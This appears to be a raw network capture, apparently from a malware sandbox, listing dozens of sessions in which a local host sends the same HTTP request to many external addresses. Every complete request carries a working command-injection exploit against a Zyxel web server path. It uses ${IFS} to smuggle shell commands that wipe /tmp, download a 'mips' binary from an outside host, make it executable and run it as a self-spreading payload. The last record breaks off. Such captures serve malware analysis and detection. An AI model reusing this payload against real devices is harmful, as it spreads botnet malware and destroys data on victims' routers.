                        Session IDSource IPSource PortDestination IPDestination Port
                        3244192.168.2.1442216217.153.126.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229746103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3245192.168.2.143446838.55.125.136443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229773998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3246192.168.2.1459432159.227.182.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229820013 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3247192.168.2.145697060.17.230.202443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229845047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3248192.168.2.1448994208.246.11.124443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229878902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3249192.168.2.1440780182.178.212.170443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229898930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3250192.168.2.1457672200.179.246.2443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229934931 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3251192.168.2.1455686144.74.147.170443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229974031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3252192.168.2.1436714148.242.89.9443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230015039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3253192.168.2.1447824172.250.117.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230030060 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3254192.168.2.1459936161.217.47.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230062962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3255192.168.2.1448138152.45.228.128443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230088949 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3256192.168.2.1449348157.153.27.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230118990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3257192.168.2.144326244.225.220.243443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230149984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3258192.168.2.145547883.189.159.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230170012 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3259192.168.2.1434706135.91.152.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230196953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3260192.168.2.145359284.181.98.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230225086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3261192.168.2.1454416191.138.169.47443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230262995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3262192.168.2.1438406205.57.205.77443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230282068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3263192.168.2.1460782197.187.29.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230315924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3264192.168.2.1455468167.176.65.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230426073 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3265192.168.2.1448648193.115.177.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230459929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3266192.168.2.144905093.36.42.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230508089 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3267192.168.2.1457212187.209.220.67443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230530977 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3268192.168.2.1459694179.100.101.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230564117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3269192.168.2.1455134101.238.221.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230616093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3270192.168.2.145436881.198.41.64443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230643988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3271192.168.2.144043073.85.60.158443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230664968 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3272192.168.2.1443564134.183.54.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230694056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3273192.168.2.1457372202.224.231.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230731010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3274192.168.2.1436206167.176.51.104443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230768919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3275192.168.2.143667432.45.198.47443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230803967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3276192.168.2.1434614124.7.111.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230828047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3277192.168.2.145725619.142.48.149443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230858088 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3278192.168.2.1438198187.152.227.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230892897 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3279192.168.2.1440702209.29.53.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230940104 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3280192.168.2.1459772159.111.115.1443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230957985 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3281192.168.2.143964857.225.123.73443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.230994940 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3282192.168.2.143757699.233.91.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231019974 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3283192.168.2.1457494102.107.152.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231060028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3284192.168.2.1441150149.95.207.57443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231067896 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3285192.168.2.1438722198.14.210.171443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231106043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3286192.168.2.1448504180.76.123.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231127977 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3287192.168.2.143673080.109.166.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231164932 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3288192.168.2.1436380142.180.231.217443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231205940 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3289192.168.2.145589419.41.51.172443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231220961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3290192.168.2.145708444.182.115.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231251001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3291192.168.2.145391465.250.39.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231277943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3292192.168.2.1460828171.56.126.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231282949 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3293192.168.2.1457436116.87.230.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231302977 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3294192.168.2.1447068158.195.127.53443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231374979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3295192.168.2.1432832170.88.210.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231389999 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3296192.168.2.1449500168.222.89.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231416941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3297192.168.2.1457056124.204.59.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231446028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3298192.168.2.1442630135.41.152.221443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231482029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3299192.168.2.1451186137.67.228.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231497049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3300192.168.2.144395227.159.80.25443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231576920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3301192.168.2.143862657.95.163.233443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231592894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3302192.168.2.1459726139.178.194.6443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231614113 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3303192.168.2.1459678147.112.106.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231662989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3304192.168.2.14398349.251.173.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231679916 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3305192.168.2.1457690108.128.47.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231702089 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3306192.168.2.1446298168.83.216.76443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231734037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3307192.168.2.1445068166.147.111.73443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231767893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3308192.168.2.144437859.69.251.117443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231786966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3309192.168.2.144814446.2.249.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231821060 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3310192.168.2.145026296.123.50.6443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231844902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3311192.168.2.1435370133.18.53.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231888056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3312192.168.2.144855286.71.140.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231913090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3313192.168.2.143379289.184.226.88443
                        TimestampBytes transferredDirectionData
